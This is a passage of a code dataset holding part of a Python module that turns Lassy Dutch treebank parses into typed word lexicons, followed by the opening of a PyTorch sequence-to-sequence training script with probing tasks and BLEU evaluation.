grouped.keys():\n children_to_remove = list()\n for c, r in grouped[key]:\n if c in keys_to_remove:\n # the child was a cut-off parent; remove the incoming edge\n children_to_remove.append([c, r])\n if key is not None:\n del c.attrib['rel'][key.attrib['id']]\n elif r in rels_to_remove:\n # the child has a 'bad' incoming edge; remove it\n children_to_remove.append([c, r])\n if key is not None:\n del c.attrib['rel'][key.attrib['id']]\n elif (len(c.attrib['rel'].values()) and\n all(map(lambda x: Decompose.get_rel(x) == 'mod', c.attrib['rel'].values()))):\n # explicit treatment of modifiers\n children_to_remove.append([c, r])\n if key is not None:\n del c.attrib['rel'][key.attrib['id']]\n\n for c in children_to_remove:\n grouped[key].remove(c)\n\n # check the parse tree for parent nodes with zero children\n empty_keys = [key for key in grouped.keys() if not grouped[key]]\n while len(empty_keys):\n for key in empty_keys:\n del grouped[key]\n for key in grouped.keys():\n for c, r in grouped[key]:\n if c in empty_keys:\n grouped[key].remove([c, r])\n if key is not None:\n del c.attrib['rel'][key.attrib['id']]\n empty_keys = [key for key in grouped.keys() if not grouped[key]]\n\n return grouped\n\n @staticmethod\n def get_disconnected(grouped):\n \"\"\"\n Takes a dictionary, possibly containing headless structures. Returns all nodes that are parents without being\n children of any other node.\n :param grouped:\n :return:\n \"\"\"\n all_keys = set(grouped.keys()) # all parents\n all_children = set([x[0] for k in all_keys for x in grouped[k]]) # all children\n # sanity check: make sure that {all_children} - {all_parents} == all_leaves\n assert(all(map(lambda x: Decompose.is_leaf(x), all_children.difference(all_keys))))\n return all_keys.difference(all_children)\n\n @staticmethod\n def abstract_object_to_subject(grouped):\n \"\"\"\n Takes a dictionary containing abstract objects/subjects and applies a series of conventions to re-assign the\n main objects/subjects.\n :param grouped:\n :return:\n \"\"\"\n\n # todo: write this neatly\n for main_parent in grouped.keys():\n\n parent = main_parent\n\n if main_parent.attrib['cat'] not in ('ssub', 'smain', 'sv1'):\n continue\n real_so = list(filter(lambda x: (x[1] == ['su', 'secondary'] or x[1] == ['obj1', 'secondary']),\n [x for x in grouped[main_parent]]))\n if not real_so:\n continue\n\n assert isinstance(real_so[0][1], list)\n parent_dep = real_so[0][1][0]\n real_so = real_so[0][0]\n\n # om te construction -- go one level lower\n ti = list(filter(lambda x: x[0].attrib['cat'] == 'ti',\n [x for x in grouped[main_parent] if 'cat' in x[0].attrib]))\n if ti:\n parent = ti[0][0]\n\n ppart = list(filter(lambda x: (x[0].attrib['cat'] == 'ppart' or x[0].attrib['cat'] == 'inf'),\n [x for x in grouped[parent] if 'cat' in x[0].attrib]))\n if not ppart:\n continue\n ppart = ppart[0][0]\n abstract_so = list(filter(lambda x: (x[1] == ['obj1', 'primary'] or x[1] == ['su', 'primary']\n or x[1] == ['sup', 'primary']) and\n (x[0].attrib['index'] == real_so.attrib['index']),\n [x for x in grouped[ppart] if 'index' in x[0].attrib]))\n\n # chained inf / ppart construction\n if not abstract_so:\n ppart = list(filter(lambda x: (x[0].attrib['cat'] == 'ppart' or x[0].attrib['cat'] == 'inf'),\n [x for x in grouped[ppart] if 'cat' in x[0].attrib]))\n if ppart:\n ppart = ppart[0][0]\n abstract_so = list(filter(lambda x: (x[1] == ['obj1', 'primary'] or x[1] == ['su', 'primary']\n or x[1] == ['sup', 'primary']) and\n (x[0].attrib['index'] == real_so.attrib['index']),\n [x for x in grouped[ppart] if 'index' in x[0].attrib]))\n if not abstract_so:\n continue\n\n rel = abstract_so[0][1][0]\n abstract_so = abstract_so[0][0]\n # # # Dictionary changes\n # remove the abstract real_so / object from being a child of the ppart/inf\n grouped[ppart].remove([abstract_so, [rel, 'primary']])\n # remove the abstract so from being a child of the ssub with a secondary label\n grouped[main_parent].remove([abstract_so, [parent_dep, 'secondary']])\n # add it again with a primary label\n grouped[main_parent].append([abstract_so, [parent_dep, 'primary']])\n # # # Internal node changes (for consistency) # todo redundant\n # remove the primary edge property from abstract object\n del abstract_so.attrib['rel'][ppart.attrib['id']]\n # convert the secondary edge to primary internally\n abstract_so.attrib['rel'][main_parent.attrib['id']] = ['su', 'primary']\n return grouped\n\n @staticmethod\n def remove_abstract_so(grouped, candidates=('su', 'obj', 'obj1', 'obj2', 'sup')):\n \"\"\"\n Takes a dictionary containing abstract subjects/objects and removes them. The main subject/object must have\n been properly assigned before.\n :param grouped:\n :return:\n \"\"\"\n for parent in grouped.keys():\n if parent.attrib['cat'] != 'ppart' and parent.attrib['cat'] != 'inf':\n # this is a proper secondary edge (non-abstract) and should not be removed\n continue\n for child, rel in grouped[parent]:\n if not isinstance(rel, list):\n # ignore non-coindexed\n continue\n red_rel = Decompose.get_rel(rel)\n if red_rel not in candidates:\n continue\n if rel[1] == 'secondary':\n # # # Dictionary changes\n # remove the abstract s/o from being a child of the ppart/inf\n grouped[parent].remove([child, rel])\n # # # Internal node changes (for consistency) # todo redundant\n del child.attrib['rel'][parent.attrib['id']]\n else:\n # Trying to remove main coindex\n if 'index' in child.keys():\n # todo?\n continue\n # raise ValueError('Found primary object between {} and {}'.format(parent.attrib['id'],\n # child.attrib['id']))\n #ToGraphViz()(grouped, output='abc')\n\n return grouped\n\n @staticmethod\n def order_siblings(siblings, exclude=None):\n \"\"\"\n Sorts a list of sibling nodes. Sorting is done on the basis of (span: start, span:end, original id)\n :param siblings:\n :param exclude:\n :return:\n \"\"\"\n if exclude is not None:\n siblings = list(filter(lambda x: x[0] != exclude, siblings))\n return sorted(siblings,\n key=lambda x: tuple(map(int, (x[0].attrib['begin'], x[0].attrib['end'], x[0].attrib['id']))))\n\n def collapse_mwu(self, grouped):\n \"\"\"\n Takes a dictionary, possibly containing multi-word units, and collapses these together. The type of the\n collapsed node is inferred by majority voting on its children.\n :param grouped:\n :param relabel:\n :return:\n \"\"\"\n to_remove = []\n\n # find all mwu parents\n for key in grouped.keys():\n if key is not None:\n if 'cat' in key.attrib.keys():\n if key.attrib['cat'] == 'mwu':\n nodes = Decompose.order_siblings(grouped[key])\n collapsed_text = ''.join([x[0].attrib['word'] + ' ' for x in nodes])\n\n key.attrib['word'] = collapsed_text[0:-1] # update the parent text\n key.attrib['cat'] = self.majority_vote(key, grouped)\n to_remove.append(key)\n\n # parent is not a parent anymore (since no children are inherited)\n for key in to_remove:\n del (grouped[key])\n return grouped\n\n def choose_head(self, children_rels):\n \"\"\"\n Takes a list of siblings and selects their head.\n :param children_rels: a list of [node, rel] lists\n :return:\n if a head is found, return the head and the rel\n if structure is headless, return None, None\n if unspecified case, raise ValueError\n \"\"\"\n for i, (candidate, rel) in enumerate(children_rels):\n if Decompose.get_rel(rel) in self.head_candidates:\n return candidate, rel\n return None, None\n\n @staticmethod\n def get_rel(rel):\n return rel[0] if isinstance(rel, list) else rel\n\n @staticmethod\n def collapse_single_non_terminals(grouped, depth=0):\n # list of nodes containing a single child\n intermediate_nodes = [k for k in grouped.keys() if len(grouped[k]) == 1]\n if not intermediate_nodes:\n return grouped\n\n # for each intermediate node\n for k in intermediate_nodes:\n # find its only child\n points_to, old_rel = grouped[k][0]\n # for each other node\n for kk in grouped.keys():\n # find its dependencies pointing to the intermediate node\n rels = [r for n, r in grouped[kk] if n == k]\n if not rels:\n continue\n if len(rels) > 1:\n ToGraphViz()(grouped)\n raise ValueError('Many rels @ non-terminal node {}.'.format(k.attrib['id']))\n new_rel = rels[0]\n grouped[kk].remove([k, new_rel])\n new_rel = new_rel[0] if isinstance(new_rel, list) else new_rel\n if isinstance(old_rel, list):\n grouped[kk].append([points_to, [rels[0], old_rel[1]]])\n points_to.attrib['rel'][kk] = [rels[0], old_rel[1]]\n else:\n grouped[kk].append([points_to, new_rel])\n points_to.attrib['rel'][kk] = new_rel\n del points_to.attrib['rel'][k.attrib['id']]\n for k in intermediate_nodes:\n del(grouped[k])\n return Decompose.collapse_single_non_terminals(grouped, depth=depth+1)\n\n def recursive_assignment(self, current, grouped, top_type, lexicon):\n \"\"\"\n Takes a node, a dictionary, a word type from the above subtree and a lexicon. Updates the lexicon with inferred\n types for this node's children and iterates downwards.\n :param current:\n :param grouped:\n :param top_type:\n :param lexicon:\n :return:\n \"\"\"\n def is_gap(node):\n # this node is involved in some sort of magic trickery if it has more than one incoming edges\n all_incoming_edges = list(map(self.get_rel, node.attrib['rel'].values()))\n if len(all_incoming_edges) > 1:\n num_heads = list(filter(lambda x: x in self.head_candidates, all_incoming_edges))\n if num_heads and len(num_heads) != len(all_incoming_edges):\n return True\n else:\n return False\n\n # find all of the node's siblings\n siblings = grouped[current]\n # pick a head\n headchild, headrel = self.choose_head(siblings)\n\n # if no type given from above, assign one now (no nested types)\n if top_type is None:\n top_type = self.get_plain_type(current, grouped)\n\n # pose some linear order and exclude the picked head\n siblings = Decompose.order_siblings(siblings, exclude=headchild)\n\n if headchild is not None:\n # pick all the arguments\n arglist = [[self.get_plain_type(sib, grouped, rel), self.get_rel(rel)] for sib, rel in siblings]\n # convert the arglist to coloured arglist\n if arglist:\n argtypes, argdeps = list(zip(*arglist))\n else:\n\n # siblings must have been removed by processing, so chain of non-terminal nodes with single child\n # ending with a single word\n if not self.is_leaf(headchild):\n # call self having made no adjustments to top_type (simply propagate it down)\n # self.recursive_assignment(headchild, grouped, top_type, lexicon)\n pass\n elif self.get_key(headchild) not in lexicon.keys():\n lexicon[self.get_key(headchild)] = top_type\n elif lexicon[self.get_key(headchild)] != top_type:\n raise KeyError('[No siblings] Trying to assign {} to node {}, when already assigned {}. '\n 'Now iterating from parent {}.'.format(top_type, headchild.attrib['id'],\n lexicon[self.get_key(headchild)],\n current.attrib['id']))\n return lexicon\n\n # classify the headchild\n gap = is_gap(headchild)\n\n # case management\n if not gap:\n # standard type assignment\n headtype = ColoredType(arguments=argtypes, result=top_type, colors=argdeps) # /W EXCHANGE\n else:\n # case of gap: project self within arglist\n\n # assert that there is one argument to project into\n if len(argtypes) != 1:\n print(argtypes)\n ToGraphViz()(grouped)\n raise NotImplementedError('Case of non-terminal gap with many arguments {} {}.'.\n format(headchild.attrib['id'], current.attrib['id']))\n\n # find the dependency which does not match the head\n internal_edge = [self.get_rel(r) for r in headchild.attrib['rel'].values()\n if self.get_rel(r) != self.get_rel(headrel)]\n\n # assert that there is just one (class) of those\n if len(set(internal_edge)) == 1:\n # construct the internal type (which includes a hypothesis for the gap)\n internal_type = ColoredType(arguments=(self.get_plain_type(headchild, grouped, internal_edge),),\n result=argtypes[0], colors=(internal_edge[0],))\n # construct the external type (which takes the internal type back to the top type)\n headtype = ColoredType(arguments=(internal_type,), result=top_type, colors=(argdeps[0],))\n else:\n assert len(argdeps) == 1 # not even sure why but this is necessary\n types = []\n for it in set(internal_edge):\n internal_type = ColoredType(arguments=(self.get_plain_type(headchild, grouped, it),),\n result=argtypes[0], colors=(it,))\n types.append(internal_type)\n # types.append(ColoredType(arguments=(internal_type,), result=top_type, colors=(argdeps[0],)))\n headtype = ColoredType(arguments=(CombinatorType(tuple(types), combinator='&'),),\n result=top_type, colors=(argdeps[0],))\n\n if Decompose.is_leaf(headchild):\n # assign the type to the lexicon\n if self.get_key(headchild) in lexicon.keys():\n old_value = lexicon[self.get_key(headchild)]\n if old_value != headtype:\n headtype = CombinatorType((headtype, old_value), combinator='&')\n lexicon[self.get_key(headchild)] = headtype\n else:\n # .. or iterate down\n self.recursive_assignment(headchild, grouped, headtype, lexicon)\n\n # now deal with the siblings\n for sib, rel in siblings:\n if not is_gap(sib):\n # simple type\n sib_type = self.get_plain_type(sib, grouped, rel)\n if Decompose.is_leaf(sib):\n # assign to lexicon\n lexicon[self.get_key(sib)] = sib_type\n else:\n # .. or iterate down\n self.recursive_assignment(sib, grouped, None, lexicon)\n\n def lexicon_to_list(self, sublex, grouped, to_sequences=True):\n \"\"\"\n Take a sublexicon {word : WordType}, partially mapping leaves from the grouped dictionary to types, and convert\n it to a (word, WordType) list that respects the original linear order of the sentence\n :param sublex:\n :param grouped:\n :param to_sequences: if True, return a list of words and a corresponding list of their types\n :return:\n \"\"\"\n # todo: sorting by keys properly\n\n all_leaves = set(list(filter(lambda x: 'word' in x.attrib.keys(),\n map(lambda x: x[0], chain.from_iterable(grouped.values())))))\n\n all_leaves = sorted(all_leaves,\n key=lambda x: tuple(map(int, (x.attrib['begin'], x.attrib['end'], x.attrib['id']))))\n\n # mapping from linear order to dictionary keys\n enum = {i: self.get_key(l) for i, l in enumerate(all_leaves)}\n\n ret = [(enum[i].split(self.separation_symbol)[0], sublex[enum[i]])\n for i in range(len(all_leaves)) if enum[i] in sublex.keys()]\n if to_sequences:\n return list(zip(*ret))\n return ret\n\n def __call__(self, grouped):\n if self.visualize:\n ToGraphViz()(grouped)\n top_nodes = Decompose.get_disconnected(grouped)\n\n top_node_types = map(lambda x: self.get_plain_type(x, grouped), top_nodes)\n\n if self.unify:\n # init lexicon here\n lexicon = dict()\n\n # recursively iterate from each top node\n for top_node in top_nodes:\n self.recursive_assignment(top_node, grouped, None, lexicon)\n if self.return_lists:\n return Decompose.lexicon_to_list(lexicon, grouped) # return the dict transformation\n return lexicon # or return the dict\n\n else:\n # one dict per disjoint sequence\n dicts = [dict() for _ in top_nodes]\n for i, top_node in enumerate(top_nodes):\n # recursively iterate each\n self.recursive_assignment(top_node, grouped, None, dicts[i])\n\n if self.return_lists:\n return list(map(lambda x: self.lexicon_to_list(x, grouped), dicts)) # return the dict transformation\n return dicts # or return the dicts\n\n\ndef main(ignore=False, return_lists=False, viz=False):\n # a non-processed dataset for comparisons\n L0 = Lassy(ignore=ignore)\n\n # a processed dataset that yields a lexicon\n decomposer = Decompose(return_lists=return_lists, visualize=viz)\n lexicalizer = Compose([lambda x: [x[0], x[2]], # keep only index and parse tree\n lambda x: [x[0], Lassy.tree_to_dag(x[1])], # convert to DAG\n lambda x: [x[0], Decompose.group_by_parent(x[1])], # convert to dict format\n lambda x: [x[0], decomposer.collapse_mwu(x[1])], # remove mwus\n lambda x: [x[0], Decompose.split_dag(x[1], # split into disjoint trees if needed\n cats_to_remove=('du',),\n rels_to_remove=('dp', 'sat', 'nucl', 'tag', '--',\n 'top', 'mod', 'predm',))],\n lambda x: [x[0], Decompose.abstract_object_to_subject(x[1])], # relabel abstract so's\n lambda x: [x[0], Decompose.remove_abstract_so(x[1])], # remove abstract so's\n lambda x: [x[0], Decompose.collapse_single_non_terminals(x[1])],\n lambda x: [x[1], decomposer(x[1])], # decompose into a lexicon\n ])\n L = Lassy(transform=lexicalizer, ignore=ignore)\n #\n X, Y = [], []\n for i in range(len(L)):\n if i == 29897: continue\n l = L[i][1]\n X.extend([x[0] for x in l])\n Y.extend([x[1] for x in l])\n return X, Y\n\n return L0, L, ToGraphViz()\n\n\nclass ToGraphViz:\n def __init__(self, to_show=('id', 'word', 'pos', 'cat', 'index')):\n self.to_show = to_show\n\n def construct_node_label(self, child):\n \"\"\"\n :param child:\n :return:\n \"\"\"\n label = ''\n for key in self.to_show:\n if key != 'span':\n try:\n label += child[key] + '\\n'\n except KeyError:\n pass\n else:\n label += child['begin'] + '-' + child['end'] + '\\n'\n return label\n\n def construct_edge_label(self, rel):\n return ' '.join(rel) if isinstance(rel, list) else rel\n\n def get_edge_style(self, rel):\n return 'dashed' if isinstance(rel, list) and rel[1] == 'secondary' else ''\n\n def xml_to_gv(self, xtree):\n nodes = list(Lassy.extract_nodes(xtree)) # a list of triples\n graph = graphviz.Digraph()\n\n graph.node('title', label=xtree.findtext('sentence'), shape='none')\n graph.node(nodes[0][0].attrib['id'], label='ROOT')\n graph.edge('title', nodes[0][0].attrib['id'], style='invis')\n\n for child, parent in nodes[1:]:\n node_label = self.construct_node_label(child.attrib)\n graph.node(child.attrib['id'], label=node_label)\n\n if type(child.attrib['rel']) == str:\n graph.edge(parent.attrib['id'], child.attrib['id'], label=child.attrib['rel'])\n else:\n for parent_id, dependency in child.attrib['rel'].items():\n graph.edge(parent_id, child.attrib['id'], label=self.construct_edge_label(dependency))\n\n return graph\n\n def grouped_to_gv(self, grouped):\n graph = graphviz.Digraph()\n reduced_sentence = ' '.join([x.attrib['word'] for x in sorted(\n set(grouped.keys()).union(set([y[0] for x in grouped.values() for y in x])),\n key=lambda x: (int(x.attrib['begin']), int(x.attrib['end']), int(x.attrib['id']))) if 'word' in x.attrib])\n\n graph.node('title', label=reduced_sentence, shape='none')\n\n for parent in grouped.keys():\n node_label = self.construct_node_label(parent.attrib)\n graph.node(parent.attrib['id'], label=node_label)\n for child, rel in grouped[parent]:\n node_label = self.construct_node_label(child.attrib)\n graph.node(child.attrib['id'], label=node_label)\n graph.edge(parent.attrib['id'], child.attrib['id'], style=self.get_edge_style(rel), label=self.construct_edge_label(rel))\n return graph\n\n def __call__(self, parse, output='gv_output', view=True):\n graph = self.xml_to_gv(parse) if isinstance(parse, ET.ElementTree) else self.grouped_to_gv(parse)\n if output:\n graph.render(output, view=view)\n\n# def reduce_lexicon(main_lex, new_lex, key_reducer=lambda x: x.split(' ')[0]):\n# \"\"\"\n#\n# :param main_lex:\n# :param new_lex:\n# :param key_reducer:\n# :return:\n# \"\"\"\n# # for each word of the new lexicon\n# for key in new_lex:\n# # remove the internal id\n# reduced_key = key_reducer(key)\n# # if the word exists in the original lexicon\n# if reduced_key in main_lex.keys():\n# # if the assigned type has already been assigned to the word in the original lexicon\n# if new_lex[key] in main_lex[reduced_key].keys():\n# # increase each occurrence count\n# main_lex[reduced_key][new_lex[key]] += 1\n# else:\n# # otherwise add it to the lexicon\n# main_lex[reduced_key][new_lex[key]] = 1\n# # if the word does not exist in the original lexicon\n# else:\n# # init a new dictionary in the original lexicon, with this type as its only key and a single occurrence\n# main_lex[reduced_key] = {new_lex[key]: 1}","sub_path":"DS.py","file_name":"DS.py","file_ext":"py","file_size_in_byte":37683,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"295962491","text":"import torch\r\nfrom torch import cuda\r\nimport torch.nn as nn\r\nimport torch.optim as optim\r\nfrom torch.autograd import Variable\r\nfrom torch.optim.lr_scheduler import *\r\n\r\nimport numpy as np\r\nimport math\r\nimport time\r\nimport os\r\n\r\nfrom logger import Logger\r\nfrom tqdm import tqdm\r\n\r\nfrom data import *\r\nfrom utils import *\r\nfrom model.Seq2Seq import *\r\nfrom model.Encoder import *\r\nfrom model.Decoder import *\r\nfrom model.ProbingTasks import ProbingTasks\r\nfrom model.LabelSmoothing import *\r\nfrom bleu import *\r\n\r\nclass NoamOpt:\r\n \"Optim wrapper that implements rate.\"\r\n def __init__(self, model_size, factor, warmup, optimizer):\r\n self.optimizer = optimizer\r\n self._step = 0\r\n self.warmup = warmup\r\n self.factor = factor\r\n self.model_size = model_size\r\n self._rate = 0\r\n\r\n def step(self):\r\n \"Update parameters and rate\"\r\n self._step += 1\r\n rate = self.rate()\r\n for p in self.optimizer.param_groups:\r\n p['lr'] = rate\r\n self._rate = rate\r\n self.optimizer.step()\r\n\r\n def rate(self, step = None):\r\n \"Implement `lrate` above\"\r\n if step is None:\r\n step = self._step\r\n return self.factor * \\\r\n (self.model_size ** (-0.5) *\r\n min(step ** (-0.5), step * self.warmup ** (-1.5)))\r\n\r\n\r\n\r\nclass Trainer(object):\r\n def __init__(self, dp, args):\r\n\r\n # Language setting\r\n self.max_len = args.max_len\r\n self.args = args\r\n\r\n # Data Loader\r\n self.dp = dp\r\n if torch.cuda.is_available():\r\n if not args.cuda:\r\n print(\"WARNING: You have a CUDA device, so you should probably run with --cuda\")\r\n\r\n self.device = torch.device(\"cuda:\" + str(args.gpu) if args.cuda else \"cpu\")\r\n\r\n # Path\r\n self.data_path = args.data_path\r\n self.sample_path = os.path.join('./samples/' + args.sample)\r\n self.log_path = os.path.join('./logs/' + args.log)\r\n\r\n if not os.path.exists(self.sample_path): os.makedirs(self.sample_path)\r\n if not os.path.exists(self.log_path): os.makedirs(self.log_path)\r\n\r\n # Hyper-parameters\r\n self.lr = args.lr\r\n self.grad_clip = args.grad_clip\r\n self.embed_dim = args.embed_dim\r\n self.hidden_dim = args.hidden_dim\r\n self.num_layer = args.num_layer\r\n\r\n # Training setting\r\n self.batch_size = args.batch_size\r\n self.num_epoch = args.num_epoch\r\n # self.iter_per_epoch = len(train_loader)\r\n\r\n # Log\r\n self.logger = open(self.log_path+'/log.txt','w')\r\n self.sample = open(self.sample_path+'/sample.txt','w')\r\n self.tf_log = Logger(self.log_path)\r\n\r\n self.pad_idx = self.dp.vocab.stoi['']\r\n\r\n self.build_model(self.dp.vocab)\r\n\r\n def pad_sequences(self, s):\r\n pad_token = self.dp.vocab.stoi['']\r\n # print(s)\r\n lengths = [len(s1) for s1 in s]\r\n longest_sent = max(lengths)\r\n\r\n padded_X = np.ones((self.args.batch_size, longest_sent), dtype=np.int64) * pad_token\r\n for i, x_len in enumerate(lengths):\r\n sequence = s[i]\r\n padded_X[i, 0:x_len] = sequence[:x_len]\r\n # print(padded_X)\r\n return padded_X\r\n\r\n def init_weights(self, m):\r\n for name, param in m.named_parameters():\r\n nn.init.uniform_(param.data, -0.08, 0.08)\r\n\r\n def build_model(self, vocabs):\r\n # build dictionaries\r\n self.vocab = self.dp.vocab\r\n # print(len(self.vocab.itos))\r\n self.encoder = Encoder(len(self.vocab.itos), self.embed_dim, self.hidden_dim, self.num_layer)\r\n self.decoder = Decoder(len(self.vocab.itos), self.embed_dim, self.hidden_dim, self.num_layer)\r\n\r\n # build the model\r\n self.model = Seq2Seq(self.encoder, self.decoder, self.device, len(self.vocab.itos)).to(self.device)\r\n for p in self.model.parameters():\r\n if p.dim() > 1:\r\n nn.init.xavier_uniform(p)\r\n\r\n if self.args.mode == 'probe':\r\n self.probe = ProbingTasks(self.encoder, self.hidden_dim, 4, 2, False).to(self.device)\r\n elif self.args.mode == 'train':\r\n self.probe = ProbingTasks(self.encoder, self.hidden_dim, 4, 2, True).to(self.device)\r\n\r\n # set the criterion and optimizer\r\n self.criterion = nn.NLLLoss(ignore_index=self.dp.vocab.stoi[''])\r\n self.criterion_ppl = nn.NLLLoss(ignore_index=self.dp.vocab.stoi[''])\r\n\r\n self.criterion2 = nn.CrossEntropyLoss()\r\n self.optimizer = optim.Adam(list(self.model.parameters()) + list(self.probe.parameters()), lr=self.lr)\r\n\r\n # self.optimizer = NoamOpt(self.model.embed_dim, 1, 400,\r\n # torch.optim.Adam(model.parameters(), lr=0, betas=(0.9, 0.98), eps=1e-9))\r\n # self.optimizer = optim.Adam(list(self.model.parameters()) + list(self.probe.parameters()), lr=self.lr)\r\n\r\n self.optimizer2 = optim.Adam(self.probe.parameters(), lr=self.lr)\r\n self.scheduler = optim.lr_scheduler.StepLR(self.optimizer, 1, gamma=0.8)\r\n\r\n if torch.cuda.is_available():\r\n self.model.cuda()\r\n\r\n print(self.model)\r\n print(self.criterion)\r\n print(self.optimizer)\r\n\r\n def build_transmodel(self, vocabs):\r\n # build dictionaries\r\n self.vocab = self.dp.vocab\r\n # print(len(self.vocab.itos))\r\n self.encoder = TransEncoder(len(self.vocab.itos), self.embed_dim, self.hidden_dim, self.num_layer)\r\n self.decoder = TransDecoder(len(self.vocab.itos), self.embed_dim, self.hidden_dim, self.num_layer)\r\n\r\n # build the model\r\n self.model = TransSeq2Seq(self.encoder, self.decoder, self.device, self.embed_dim, len(self.vocab.itos)).to(self.device)\r\n self.model.apply(self.init_weights)\r\n\r\n if self.args.mode == 'probe':\r\n self.probe = ProbingTasks(self.encoder, self.hidden_dim, 4, 2, False).to(self.device)\r\n elif self.args.mode == 'train':\r\n self.probe = ProbingTasks(self.encoder, self.hidden_dim, 4, 2, True).to(self.device)\r\n\r\n # set the criterion and optimizer\r\n # self.criterion = LabelSmoothing(len(self.dp.vocab.itos), self.dp.vocab.stoi[''], 0.0)\r\n self.criterion = nn.NLLLoss(ignore_index=self.dp.vocab.stoi[''])\r\n self.criterion_ppl = nn.NLLLoss(ignore_index=self.dp.vocab.stoi[''])\r\n self.criterion2 = nn.CrossEntropyLoss()\r\n self.optimizer = optim.Adam(list(self.model.parameters()) + list(self.probe.parameters()), lr=self.lr)\r\n\r\n self.optimizer2 = optim.Adam(self.probe.parameters(), lr=self.lr)\r\n self.scheduler = optim.lr_scheduler.StepLR(self.optimizer, 1, gamma=0.8)\r\n\r\n if torch.cuda.is_available():\r\n self.model.cuda()\r\n\r\n print(self.model)\r\n print(self.criterion)\r\n print(self.optimizer)\r\n\r\n def count_parameters(self, model):\r\n return sum(p.numel() for p in model.parameters() if p.requires_grad)\r\n\r\n def greedy_decode(self, model, src, max_len, start_symbol):\r\n with torch.no_grad():\r\n # memory = model.encoder(src)\r\n ys = (torch.ones(1, src.size(1)) * start_symbol).type_as(src.data)\r\n probs = torch.FloatTensor(torch.zeros(max_len, src.size(1), len(self.dp.vocab.itos))).to(self.device)\r\n for i in range(max_len):\r\n prob = model(src, ys, 0)\r\n _, next_word = torch.max(prob[-1, :, :], dim=-1)\r\n # print(next_word.size())\r\n next_word = next_word.data\r\n # print(next_word)\r\n probs[i] = prob[-1, :, :]\r\n ys = torch.cat([ys,\r\n torch.ones(1, src.size(1)).type_as(src.data)*next_word], dim=0)\r\n return ys, probs\r\n\r\n def evaluate(self):\r\n self.model.eval()\r\n start_time = time.time()\r\n epoch_loss = 0\r\n epoch_loss_ppl = 0\r\n num_batches = len(self.dp.val_src)//self.args.batch_size\r\n epoch_bleu = 0\r\n epoch_sentlen = 0\r\n epoch_wp = 0\r\n tgt = []\r\n pred = []\r\n with torch.no_grad():\r\n for i in range(num_batches):\r\n # hidden = self.model.encoder.init_hidden(self.args.batch_size)\r\n src = self.pad_sequences(self.dp.val_src[i*self.args.batch_size : (i+1)*self.args.batch_size])\r\n tgt = self.pad_sequences(self.dp.val_tgt[i*self.args.batch_size : (i+1)*self.args.batch_size])\r\n lng = self.dp.val_tgtlng[i*self.args.batch_size : (i+1)*self.args.batch_size]\r\n sentlen = self.dp.val_src_sentlen[i*self.args.batch_size : (i+1)*self.args.batch_size]\r\n word_pairs = self.dp.val_word_pair[i*self.args.batch_size : (i+1)*self.args.batch_size]\r\n word_pairs_y = self.dp.val_word_pair_y[i*self.args.batch_size : (i+1)*self.args.batch_size]\r\n\r\n src = torch.LongTensor(src).to(self.device).transpose(0, 1)\r\n tgt = torch.LongTensor(tgt).to(self.device).transpose(0, 1)\r\n lng = torch.LongTensor(lng).to(self.device)\r\n sentlen = torch.LongTensor(sentlen).to(self.device)\r\n word_pairs = torch.LongTensor(word_pairs).to(self.device)\r\n word_pairs_y = torch.LongTensor(word_pairs_y).to(self.device)\r\n\r\n\r\n output, logits = self.greedy_decode(self.model, src, tgt[1:, :].size(0), self.dp.vocab.stoi[''])\r\n # sentlen_out, wp_out = self.probe(src, lng, word_pairs)\r\n # loss_syn1 = self.criterion2(sentlen_out, sentlen)\r\n # loss_syn2 = self.criterion2(wp_out, word_pairs_y)\r\n\r\n output_ = logits.view(-1, logits.shape[-1])\r\n # print(tgt[1:, :].size())\r\n # print(logits.size())\r\n tgt_ = (tgt[1:, :]).contiguous().view(-1)\r\n loss = self.criterion(output_, tgt_)\r\n # loss /= (output.size(0)*output.size(1))\r\n epoch_loss_ppl += self.criterion_ppl(output_, tgt_).item()\r\n epoch_loss += loss.item()\r\n # epoch_sentlen += loss_syn1.item()\r\n # epoch_wp += loss_syn2.item()\r\n\r\n pred_sents = []\r\n trg_sents = []\r\n output = output[:].transpose(0, 1)\r\n tgt = tgt.transpose(0, 1)\r\n # print(output.size())\r\n # print(tgt.size())\r\n\r\n for j in range(self.args.batch_size):\r\n # print(output.size())\r\n pred_sent = self.get_sentence(output[j, 1:].data.cpu().numpy().tolist(), 'tgt')\r\n trg_sent = self.get_sentence(tgt[j, 1:].data.cpu().numpy().tolist(), 'tgt')\r\n pred_sents.append(pred_sent)\r\n trg_sents.append(trg_sent)\r\n if i == 1:\r\n print('Pred: ' + str(' '.join(pred_sent)))\r\n print('Target: ' + str(' '.join(trg_sent)))\r\n epoch_bleu += get_bleu(pred_sents, trg_sents)\r\n message = \"Val loss: %1.3f val_bleu: %1.3f , val_ppl: %4.3f, val_sentlen: %1.3f, val_wp: %1.3f, elapsed: %1.3f \" % (\r\n epoch_loss/num_batches, epoch_bleu/num_batches, np.exp(epoch_loss_ppl/num_batches), epoch_sentlen/num_batches, epoch_wp/num_batches, time.time() - start_time)\r\n print(message)\r\n\r\n return epoch_bleu/num_batches\r\n\r\n def train(self):\r\n self.best_bleu = .0\r\n patience = 0\r\n print(f'The model has {self.count_parameters(self.model):,} trainable parameters')\r\n\r\n for epoch in range(1, self.num_epoch):\r\n #self.scheduler.step()\r\n\r\n self.train_loss = 0\r\n self.train_loss_ppl = 0\r\n self.train_bleu = 0\r\n self.train_sentlen = 0\r\n self.train_wp = 0\r\n start_time = time.time()\r\n\r\n num_batches = len(self.dp.train_src)//self.args.batch_size\r\n\r\n for i in tqdm(range(num_batches)):\r\n self.model.train()\r\n # hidden = self.model.encoder.init_hidden(self.args.batch_size)\r\n src = self.pad_sequences(self.dp.train_src[i*self.args.batch_size : (i+1)*self.args.batch_size])\r\n tgt = self.pad_sequences(self.dp.train_tgt[i*self.args.batch_size : (i+1)*self.args.batch_size])\r\n tgtlng = self.dp.train_tgtlng[i*self.args.batch_size : (i+1)*self.args.batch_size]\r\n srclng = self.dp.train_srclng[i*self.args.batch_size : (i+1)*self.args.batch_size]\r\n sentlen = self.dp.train_src_sentlen[i*self.args.batch_size : (i+1)*self.args.batch_size]\r\n word_pairs = self.dp.train_word_pair[i*self.args.batch_size : (i+1)*self.args.batch_size]\r\n word_pairs_y = self.dp.train_word_pair_y[i*self.args.batch_size : (i+1)*self.args.batch_size]\r\n\r\n # import pdb; pdb.set_trace();\r\n src = torch.LongTensor(src).to(self.device).transpose(0, 1)\r\n tgt = torch.LongTensor(tgt).to(self.device).transpose(0, 1)\r\n\r\n 